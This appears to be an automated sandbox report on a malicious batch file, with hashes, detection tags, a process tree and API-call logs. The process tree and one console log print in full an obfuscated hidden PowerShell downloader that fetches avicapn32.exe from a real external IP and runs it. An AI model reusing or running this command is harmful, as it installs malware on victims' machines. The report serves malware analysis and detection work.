Summary | ZeroBOX

cmpbksrvc32.cmd

Generic Malware, Malicious Library, Downloader, Antivirus, HTTP, ScreenShot, Create Service, KeyLogger, Internet API, P2P, DGA, Http API, FTP, Socket, Escalate privileges, DNS, Code injection, Sniff Audio, Steal credential, AntiDebug, PE File, AntiVM, PE32, PowerShell
Category FILE
Machine s1_win7_x6401
Started Jan. 27, 2023, 9:26 a.m.
Completed Jan. 27, 2023, 9:33 a.m.
Size 45.3KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 bc352f34af0f8ee2c8296dd6aa86b7e7
SHA256 7af42e6fa7955f7bf85eb95443fae9343963f2c1f4a9ae106ab77fe6bb74a4e2
CRC32 A3CBCBA0
ssdeep 768:dfX3Zb0v0cSbvTDW5p8DPK11Nw7ZzDI+xsy1MEOZcq7Gqzo4WomBBuxIDzJvTIKd:VOvtS+p8DPM87LxskMEO+0E0Ykxq
Yara
  • Antivirus - Contains references to security software

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "iHjkEoTtwJ" C:\Users\test22\AppData\Local\Temp\cmpbksrvc32.cmd

    PID 2544
    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\cmpbksrvc32.cmd

      PID 2616
      • powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ex BYPAsS -noNI -W HiddEn $EFGiZIWe = [NET.WebrEQuest]::CreaTe( ([chAR] 104 + [chAR] 116 + [cHAr] 116 + [ChAr] 112 + [chAR] 58 + [cHar] 47 + [cHaR] 47 + [CHAr] 53 + [CHAr] 46 + [chAr] 55 + [CHAr] 53 + [ChaR] 46 + [CHAr] 50 + [cHAR] 52 + [cHaR] 56 + [CHaR] 46 + [CHar] 50 + [chaR] 48 + [chAr] 55 + [Char] 47 + [CHar] 97 + [cHaR] 118 + [CHAR] 105 + [CHaR] 99 + [CHar] 97 + [cHAr] 112 + [char] 110 + [ChaR] 51 + [cHAr] 50 + [char] 46 + [chAr] 101 + [ChAr] 120 + [Char] 101 ) ).GEtResPOnSE( ).COntenTleNgth ; ( New-OBJeCt ( [char] 78 + [chAr] 101 + [CHAr] 116 + [cHAR] 46 + [cHAr] 87 + [ChAR] 69 + [ChAR] 66 + [char] 67 + [cHAr] 108 + [chaR] 73 + [ChAr] 101 + [chaR] 110 + [chAR] 116 )).( [chaR] 100 + [chAR] 111 + [ChAR] 119 + [Char] 110 + [cHaR] 108 + [ChaR] 111 + [CHAR] 97 + [Char] 68 + [CHAr] 70 + [cHAR] 105 + [CHar] 76 + [ChAR] 101 + [cHaR] 97 + [cHar] 115 + [ChaR] 121 + [ChAR] 110 + [cHAR] 99 ).inVOKE( ([chAR] 104 + [cHAr] 116 + [ChAr] 116 + [chAR] 112 + [cHar] 58 + [cHaR] 47 + [CHAr] 47 + [CHAr] 53 + [chAr] 46 + [CHAr] 55 + [ChaR] 53 + [CHAr] 46 + [cHAR] 50 + [cHaR] 52 + [CHaR] 56 + [CHar] 46 + [chaR] 50 + [chAr] 48 + [Char] 55 + [CHar] 47 + [cHaR] 97 + [CHAR] 118 + [CHaR] 105 + [CHar] 99 + [cHAr] 97 + [char] 112 + [ChaR] 110 + [cHAr] 51 + [char] 50 + [chAr] 46 + [ChAr] 101 + [Char] 120 + [CHar] 101 ) , 'C:\Users\test22\AppData\Local\Temp\avicapn32.exe' ) ; If ( TesT-PATh 'C:\Users\test22\AppData\Local\Temp\avicapn32.exe' ) { dO { $BGyLZQxsIspBheUMTlPoHVXx = ([Io.FIlEINfo] 'C:\Users\test22\AppData\Local\Temp\avicapn32.exe' ).lEnGth } UnTIL ( $BGyLZQxsIspBheUMTlPoHVXx -EQ $EFGiZIWe )} ; "&" 'C:\Users\test22\AppData\Local\Temp\avicapn32.exe'

        PID 2704

Hosts (Name / Response / Post-Analysis Lookup): No hosts contacted.
IP Address: 5.75.248.207 (Status: Active, Action: Moloch)

No DNS name was resolved because the downloader addresses its server by IP literal (see the GET request to http://5.75.248.207/avicapn32.exe below), so the IP entry is the only network contact recorded.

Time & API | Arguments | Status | Return | Repeated (each call below lists its arguments, then Status, Return and Repeated on its last line)

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API | Arguments | Status | Return | Repeated

IsDebuggerPresent

0 0
Time & API | Arguments | Status | Return | Repeated

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 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
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The input line is too long.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: -ex BYPAsS -noNI -W HiddEn $EFGiZIWe = [NET.WebrEQuest]::CreaTe( ([chAR] 104 + [chAR] 116 + [cHAr] 116 + [ChAr] 112 + [chAR] 58 + [cHar] 47 + [cHaR] 47 + [CHAr] 53 + [CHAr] 46 + [chAr] 55 + [CHAr] 53 + [ChaR] 46 + [CHAr] 50 + [cHAR] 52 + [cHaR] 56 + [CHaR] 46 + [CHar] 50 + [chaR] 48 + [chAr] 55 + [Char] 47 + [CHar] 97 + [cHaR] 118 + [CHAR] 105 + [CHaR] 99 + [CHar] 97 + [cHAr] 112 + [char] 110 + [ChaR] 51 + [cHAr] 50 + [char] 46 + [chAr] 101 + [ChAr] 120 + [Char] 101 ) ).GEtResPOnSE( ).COntenTleNgth ; ( New-OBJeCt ( [char] 78 + [chAr] 101 + [CHAr] 116 + [cHAR] 46 + [cHAr] 87 + [ChAR] 69 + [ChAR] 66 + [char] 67 + [cHAr] 108 + [chaR] 73 + [ChAr] 101 + [chaR] 110 + [chAR] 116 )).( [chaR] 100 + [chAR] 111 + [ChAR] 119 + [Char] 110 + [cHaR] 108 + [ChaR] 111 + [CHAR] 97 + [Char] 68 + [CHAr] 70 + [cHAR] 105 + [CHar] 76 + [ChAR] 101 + [cHaR] 97 + [cHar] 115 + [ChaR] 121 + [ChAR] 110 + [cHAR] 99 ).inVOKE( ([chAR] 104 + [cHAr] 116 + [ChAr] 116 + [chAR] 112 + [cHar] 58 + [cHaR] 47 + [CHAr] 47 + [CHAr] 53 + [chAr] 46 + [CHAr] 55 + [ChaR] 53 + [CHAr] 46 + [cHAR] 50 + [cHaR] 52 + [CHaR] 56 + [CHar] 46 + [chaR] 50 + [chAr] 48 + [Char] 55 + [CHar] 47 + [cHaR] 97 + [CHAR] 118 + [CHaR] 105 + [CHar] 99 + [cHAr] 97 + [char] 112 + [ChaR] 110 + [cHAr] 51 + [char] 50 + [chAr] 46 + [ChAr] 101 + [Char] 120 + [CHar] 101 ) , 'C:\Users\test22\AppData\Local\Temp\avicapn32.exe' ) ; If ( TesT-PATh 'C:\Users\test22\AppData\Local\Temp\avicapn32.exe' ) { dO { $BGyLZQxsIspBheUMTlPoHVXx = ([Io.FIlEINfo] 'C:\Users\test22\AppData\Local\Temp\avicapn32.exe' ).lEnGth } UnTIL ( $BGyLZQxsIspBheUMTlPoHVXx -EQ $EFGiZIWe )} ; "&" 'C:\Users\test22\AppData\Local\Temp\avicapn32.exe'
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0
Time & API | Arguments | Status | Return | Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e3ae8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e44e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e44e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e44e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e44e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e44e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e44e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e3928
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e3928
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e3928
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e41e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e4668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e45a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e45a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API | Arguments | Status | Return | Repeated

GlobalMemoryStatusEx

1 1 0
Time & API | Arguments | Status | Return | Repeated

__exception__

stacktrace:
avicapn32+0xad56aa @ 0xed56aa

exception.instruction_r: 90 e8 d1 dd fe ff e9 db de 39 00 55 c3 48 e9 a4
exception.symbol: avicapn32+0x770e5f
exception.instruction: nop
exception.module: avicapn32.exe
exception.exception_code: 0x80000004 (STATUS_SINGLE_STEP)
exception.offset: 7802463 (0x770e5f)
exception.address: 0xb70e5f
registers.esp: 1636216 (0x0018f778)
registers.edi: 4194304 (0x00400000)
registers.eax: 1071332970 (0x3fdb3e6a)
registers.ebp: 1638240 (0x0018ff60)
registers.edx: 47 (0x2f)
registers.ebx: 0
registers.esi: 0
